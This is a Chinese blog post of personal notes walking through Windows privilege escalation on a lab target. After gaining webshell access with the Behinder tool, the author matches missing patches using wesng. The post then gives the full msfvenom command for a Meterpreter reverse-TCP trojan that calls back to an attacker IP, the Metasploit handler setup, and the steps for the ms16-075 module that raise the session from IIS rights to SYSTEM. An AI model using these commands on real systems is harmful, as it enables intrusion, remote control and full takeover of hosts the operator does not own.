web提权

这里利用冰蝎远程连接到了靶机上:

利用systeminfo查看靶机系统的补丁;

如果有权限可以在靶机上创建txt文件保存,在用冰蝎下载下来,没有的话就复制粘贴到本地txt文件。

然后就利用本机下载的wesng去对比补丁库吧,命令如下:

wesng目录下:

python wes.py systeminfo.txt -o vuln.csv

对比结果保存为vuln.csv文件:

这里我们就有可利用的补丁漏洞了;

接下来用linux或者忍者系统去创建一个远程木马

命令行下:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108(反弹shell的主机) LPORT=5555 -f exe -o test.exe

这里就创建了一个木马,然后把他上传到靶机上(这里没做免杀,因为我还没学到)

在运行木马前,我们要进行监听,这样执行结果我们才能知道。

命令行下:msfconsole

                 use exploit/multi/handler

                 set payload windows/x64/meterpreter/reverse_tcp

                 show options(显示可以设置什么参数)

                 set  LHOST  0.0.0.0 (什么都接受)

                 set LPORT   5555(和上面对应)、

                 exploit(执行)

这里就开始监听了。我们再用冰蝎去连接网站后台,执行test.exe文件,Linux主机上就可以监听结果了。

用getuid  查看获取的权限——这里权限应当是IIS网站权限。命令)

然后我们就可以利用前面的补丁漏洞进行提权了。

background  返回session会话,不要打错了,打成exit   你就重新来过了。命令)

这里我选择的是ms16-075漏洞;

search ms16 查看ms16漏洞(命令)

找到ms16-075那个

use  前面的ms16-075漏洞名称  命令)

set session 1(就是刚才那个会话,这里我的是1)

set LHOST  你的linux 主机地址

set LPORT  端口,这里不要和上面5555一样,因为是两个会话

exploit 执行

成功。

getuid 查看获取的权限   显示的应该是system权限了

个人笔记,只是记下思路。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值